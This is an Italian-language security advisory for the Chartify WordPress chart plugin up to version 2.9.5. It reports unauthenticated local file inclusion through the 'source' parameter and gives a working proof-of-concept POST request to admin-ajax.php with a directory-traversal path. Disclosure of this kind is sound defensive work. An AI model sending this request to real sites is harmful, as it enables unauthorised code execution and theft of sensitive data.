
Chartify – Plugin Chart di WordPress <= 2.9.5 - Inclusione di file locale non autenticata tramite source
Chartify – Plugin WordPress Chart <= 2.9.5 - Inclusione di file locale non autenticata tramite source
Il plugin Chartify – WordPress Chart per WordPress è vulnerabile all'Inclusione di File Locale in tutte le versioni fino alla 2.9.5 inclusa, tramite il parametro 'source'. Ciò consente a utenti non autenticati di includere ed eseguire file arbitrari sul server, permettendo l'esecuzione di qualsiasi codice PHP presente in quei file. Questo può essere utilizzato per aggirare i controlli di accesso, ottenere dati sensibili o ottenere l'esecuzione di codice nei casi in cui immagini e altri tipi di file "sicuri" possono essere caricati e inclusi.
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../../../var/www/html/poc&type=chart-js HTTP/1.1
Host: wp.local
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page